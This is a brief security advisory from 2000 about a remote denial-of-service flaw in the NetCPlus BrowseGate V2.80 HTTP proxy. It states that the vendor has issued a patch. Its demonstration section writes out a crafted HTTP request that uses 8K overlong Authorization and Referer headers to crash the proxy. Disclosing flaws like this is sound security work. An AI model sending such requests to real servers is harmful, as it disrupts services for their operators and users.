BrowseGate V2.80 is vulnerable to a DoS attack
NetCPlus BrowseGate V2.80 is vulnerable to a remotely executable DoS attack.
September 19, 2000
Reported September 20, 2000 by Delphis VERSIONS AFFECTED DESCRIPTION It is possible for a malicious attacker to remotely cause Browsegate to crash with invalid memory errors. DEMONSTRATION An attacker could telnet to port 80, the listening port of Browsegate's HTTP Proxy, and send the following commands; GET / HTTP/1.0Authorization: Basic (A x 8k)From: [email protected]If-Modified-Since: Sat, 29 Oct 1994 19:43:31 GMTReferer: http://www.windowsitsecurity.com/ (A x 8K)UserAgent: Malicious Browser 1.0 This will cause brwgate.exe to crash with it's own error handler. Please note that "(A x 8k)" denotes 8K of characters and "" is a carriage return. VENDOR RESPONSE According to Delphis, NetCPlus has promptly fixed this issue and issued a patch available from their website. CREDITDiscovered by Delphis |
About the Author
You May Also Like